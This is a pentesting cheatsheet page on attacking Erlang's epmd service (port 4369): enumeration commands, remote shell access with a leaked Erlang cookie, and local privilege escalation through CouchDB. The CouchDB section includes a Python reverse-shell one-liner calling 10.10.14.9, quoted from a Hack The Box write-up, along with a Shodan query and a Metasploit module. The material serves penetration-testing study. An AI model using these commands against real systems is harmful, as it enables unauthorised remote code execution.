daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

4369-pentesting-erlang-port-mapper-daemon-epmd.md (4609B)


      1 ---
      2 title: "4369 Pentesting Erlang Port Mapper Daemon (epmd)"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # 4369 Pentesting Erlang Port Mapper Daemon (epmd)
     14 
     15 ## Basic Info
     16 
     17 The **Erlang Port Mapper Daemon (epmd)** maps distributed Erlang node names to the TCP ports on which those nodes accept distribution connections. It does not map names to machine addresses and does not itself provide a remote shell.<sup>[[4]](#references)</sup>
     18 
     19 **Default port**: 4369
     20 
     21 ```text
     22 PORT     STATE SERVICE VERSION
     23 4369/tcp open  epmd    Erlang Port Mapper Daemon
     24 ```
     25 
     26 This is used by default on RabbitMQ and CouchDB installations.
     27 
     28 ## Enumeration
     29 
     30 ### Manual
     31 
     32 The commands below use Erlang/OTP; official builds and source releases are available from the Erlang project.<sup>[[6]](#references)</sup>
     33 
     34 ```bash
     35 echo -n -e "\x00\x01\x6e" | nc -vn <IP> 4369
     36 
     37 # Install Erlang/OTP from your distribution or the official downloads page
     38 dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb
     39 apt-get install erlang
     40 erl #Once Erlang is installed this will promp an erlang terminal
     41 1> net_adm:names('<HOST>'). #This will return the listen addresses
     42 ```
     43 
     44 ### Automatic
     45 
     46 ```bash
     47 nmap -sV -Pn -n -T4 -p 4369 --script epmd-info <IP>
     48 
     49 PORT     STATE SERVICE VERSION
     50 4369/tcp open  epmd    Erlang Port Mapper Daemon
     51 | epmd-info:
     52 |   epmd_port: 4369
     53 |   nodes:
     54 |     bigcouch: 11502
     55 |     freeswitch: 8031
     56 |     ecallmgr: 11501
     57 |     kazoo_apps: 11500
     58 |_    kazoo-rabbitmq: 25672
     59 ```
     60 
     61 ## Erlang Cookie RCE
     62 
     63 ### Remote Connection
     64 
     65 If an exposed distribution node accepts a leaked Erlang cookie, the holder can authenticate as a peer and may invoke powerful RPC functions, often leading to command execution with the node's OS privileges. The default user cookie is normally stored in `~/.erlang.cookie`; current runtimes generate a 20-character cookie when creating the file, but operators can set a different value or location.<sup>[[1]](#references)[[5]](#references)</sup>
     66 
     67 ```bash
     68 greif@baldr ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn
     69 Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10]
     70 
     71 Eshell V8.1 (abort with ^G)
     72 
     73 At last, we can start an erlang shell on the remote system.
     74 
     75 (test@target.fqdn)1>os:cmd("id").
     76 "uid=0(root) gid=0(root) groups=0(root)\n"
     77 ```
     78 
     79 More information in [https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/)<sup>[[1]](#references)</sup>\
     80 The author also share a program to brutforce the cookie:
     81 
     82 [Epmd Bf 0.1.Tar.Bz2](epmd_bf-0.1.tar.bz2)
     83 
     84 ### Local Connection
     85 
     86 In this case we are going to abuse CouchDB to escalate privileges locally:<sup>[[2]](#references)</sup>
     87 
     88 ```bash
     89 HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE
     90 (anonymous@canape)1> rpc:call('couchdb@localhost', os, cmd, [whoami]).
     91 "homer\n"
     92 (anonymous@canape)4> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]).
     93 ```
     94 
     95 Example taken from [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)<sup>[[3]](#references)</sup>\
     96 You can use **Canape HTB machine to** **practice** how to **exploit this vuln**.
     97 
     98 ### Metasploit
     99 
    100 ```bash
    101 #Metasploit can also exploit this if you know the cookie
    102 msf5> use exploit/multi/misc/erlang_cookie_rce
    103 ```
    104 
    105 ## Shodan
    106 
    107 - `port:4369 "at port"`
    108 
    109 ## References
    110 
    111 - [1] [Erlang distribution RCE and a cookie bruteforcer](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/)
    112 - [2] [HTB: Canape](https://0xdf.gitlab.io/2018/09/15/htb-canape.html)
    113 - [3] [2018/09](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)
    114 - [4] [Erlang/OTP — EPMD protocol](https://www.erlang.org/doc/apps/erts/erl_dist_protocol.html#epmd-protocol)
    115 - [5] [Erlang/OTP — Distributed Erlang security](https://www.erlang.org/doc/system/distributed.html#security)
    116 - [6] [Erlang/OTP downloads](https://www.erlang.org/downloads)